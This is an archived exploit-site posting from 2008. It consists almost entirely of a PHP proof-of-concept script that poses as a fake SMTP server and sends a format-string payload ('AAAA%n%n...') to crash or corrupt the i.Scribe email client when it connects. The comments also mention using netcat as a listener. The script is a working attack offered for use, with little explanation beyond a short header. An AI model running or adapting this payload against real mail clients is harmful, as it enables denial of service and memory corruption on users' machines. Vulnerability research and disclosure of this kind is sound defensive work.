Home / os / win10

iscribesmtp-format.txt

Posted on 28 November 2008

<?php //I dont have c lol /*___=++++++++++++__=--=________***** 0-- -- i.Scribe smtp client v 1.88 to 2.00 beta Format String (wscanf) bug p0c vendor : Memecode Software grTs;SiD.psycho A.Luja 27.11.08 --)(________++++++++++++++++++++---*** ___00)_- NOTE!!! you must enabled extension=php_sockets.dll in php.ini ___== Or just open nc -l -p 25 lol*/ $host= $_SERVER[SERVER_ADDR]; $port= 25; $ret = "AAAA%n%n%n%n%n%n%n%n%n"; $socket = socket_create(AF_INET, SOCK_STREAM, 0) or die ("socket error "); $bind = socket_bind ($socket, $host, $port) or die ("bind error "); $listen = socket_listen($socket,1) or die("listen error "); printf("--==Fake smtp server ready==---- "); printf("Now connect here witch iScribe client "); if(($acp=socket_accept($socket))!==false){ printf("Target connected "); sleep(2); printf("send evil char "); $hello=socket_write($acp,$ret,strlen($ret)); printf("done "); socket_close($acp); } socket_close($socket); exit(); ?> //Alfons Luja

 

TOP